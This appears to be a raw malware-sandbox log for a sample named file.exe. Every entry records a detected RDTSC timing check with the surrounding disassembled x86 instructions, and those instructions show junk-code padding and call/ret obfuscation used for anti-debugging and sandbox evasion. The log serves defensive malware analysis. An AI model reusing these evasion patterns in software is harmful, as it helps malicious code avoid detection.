                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DC5F second address: 103DC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DC65 second address: 103DC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F05C150211Eh 0x0000000d pushad 0x0000000e jmp 00007F05C1502120h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1031B52 second address: 1031B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007F05C12920C6h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 push edx 0x00000011 jnp 00007F05C12920B6h 0x00000017 jmp 00007F05C12920BEh 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007F05C12920B6h 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1031B91 second address: 1031B97 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EA91 second address: 103EA9B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05C12920B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041585 second address: 104159F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C1502126h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104159F second address: 10415C4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F05C12920B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 jc 00007F05C12920B6h 0x00000016 pop edi 0x00000017 jl 00007F05C12920C2h 0x0000001d jnl 00007F05C12920B6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10415C4 second address: 10415D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F05C150211Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045654 second address: 1045663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F05C12920B6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045663 second address: 104568B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05C1502116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F05C1502129h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045D73 second address: 1045D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F05C12920B6h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045D7E second address: 1045D84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045D84 second address: 1045D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045D88 second address: 1045D96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046EF3 second address: 1046EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046EF7 second address: 1046F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046F01 second address: 1046F05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046F05 second address: 1046F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jp 00007F05C150211Eh 0x00000011 jns 00007F05C1502118h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d jmp 00007F05C150211Eh 0x00000022 popad 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F05C1502127h 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104971E second address: 1049724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049724 second address: 1049728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049A44 second address: 1049A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F05C12920C6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049A5F second address: 1049A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049A66 second address: 1049A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F05C12920B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F05C12920C1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049E34 second address: 1049E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049E3A second address: 1049E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049E3E second address: 1049E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049E44 second address: 1049E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05C12920C6h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049E62 second address: 1049E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049E66 second address: 1049E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jnp 00007F05C12920D4h 0x0000000f jp 00007F05C12920BCh 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jno 00007F05C12920B6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BC7E second address: 104BC82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BC82 second address: 104BCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F05C12920C5h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push edi 0x00000014 jmp 00007F05C12920BCh 0x00000019 pop edi 0x0000001a jmp 00007F05C12920C3h 0x0000001f popad 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jmp 00007F05C12920BBh 0x00000029 pop eax 0x0000002a mov di, cx 0x0000002d push F6CB1017h 0x00000032 pushad 0x00000033 jmp 00007F05C12920BEh 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BE30 second address: 104BE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BE35 second address: 104BE3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BE3B second address: 104BE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C200 second address: 104C20A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05C12920BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104CE33 second address: 104CE3D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F05C150211Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104CF56 second address: 104CF71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104CF71 second address: 104CF83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D552 second address: 104D556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DF15 second address: 104DF1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DF1B second address: 104DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F07A second address: 104F0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 xor edi, 5429F8DFh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F05C1502118h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b clc 0x0000002c push 00000000h 0x0000002e mov si, 8524h 0x00000032 push eax 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10509C2 second address: 10509C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F812 second address: 104F816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10509C8 second address: 10509CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F816 second address: 104F832 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05C1502121h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10509CE second address: 10509E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F05C12920B6h 0x0000000a jmp 00007F05C12920BEh 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100DE17 second address: 100DE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F05C1502116h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F05C1502129h 0x00000011 popad 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F05C1502128h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100DE5A second address: 100DE6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jl 00007F05C12920B6h 0x0000000f pop edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100DE6A second address: 100DE82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C1502122h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051003 second address: 105101E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F05C12920B8h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105101E second address: 1051023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051823 second address: 1051831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052691 second address: 1052697 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052697 second address: 105269C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105269C second address: 10526DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 add dword ptr [ebp+122D1D3Ah], edi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F05C1502118h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a and si, 48E5h 0x0000002f push 00000000h 0x00000031 mov esi, dword ptr [ebp+122D2F0Bh] 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10526DD second address: 10526E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10526E2 second address: 10526E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10526E8 second address: 10526EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10526EC second address: 10526F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10526F0 second address: 10526FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10526FE second address: 1052702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10531D7 second address: 10531DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10531DF second address: 1053210 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05C1502116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F05C1502123h 0x00000014 jmp 00007F05C150211Eh 0x00000019 popad 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053210 second address: 1053258 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05C12920B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F05C12920B8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D1BCBh] 0x0000002d mov dword ptr [ebp+1245F201h], ecx 0x00000033 push 00000000h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053258 second address: 105325C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105325C second address: 1053266 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05C12920B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053266 second address: 105328D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F05C150212Dh 0x00000008 jmp 00007F05C1502127h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105328D second address: 1053294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053C4A second address: 1053C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1053A25 second address: 1053A2F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05C12920B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057E97 second address: 1057E9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057E9D second address: 1057F0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jnl 00007F05C12920C8h 0x00000010 push 00000000h 0x00000012 call 00007F05C12920C8h 0x00000017 sub edi, 704014C5h 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F05C12920B8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057F0F second address: 1057F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058EF0 second address: 1058F5D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05C12920B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jg 00007F05C12920B9h 0x00000013 movsx ebx, dx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F05C12920B8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F05C12920B8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D270Eh], ecx 0x00000054 push eax 0x00000055 push edi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058101 second address: 1058105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058105 second address: 105810B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105810B second address: 1058145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05C150211Ah 0x00000008 jmp 00007F05C1502126h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007F05C150211Dh 0x00000018 pop esi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059F55 second address: 1059F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007F05C12920B6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007F05C12920C4h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10590AE second address: 10590BC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05C1502116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10590BC second address: 10590C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AF01 second address: 105AF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F05C1502116h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A122 second address: 105A126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A126 second address: 105A136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A209 second address: 105A20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A20E second address: 105A213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B0BD second address: 105B0D3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F05C12920B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F05C12920B8h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CEE4 second address: 105CEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C135 second address: 105C13A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DF5D second address: 105DF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
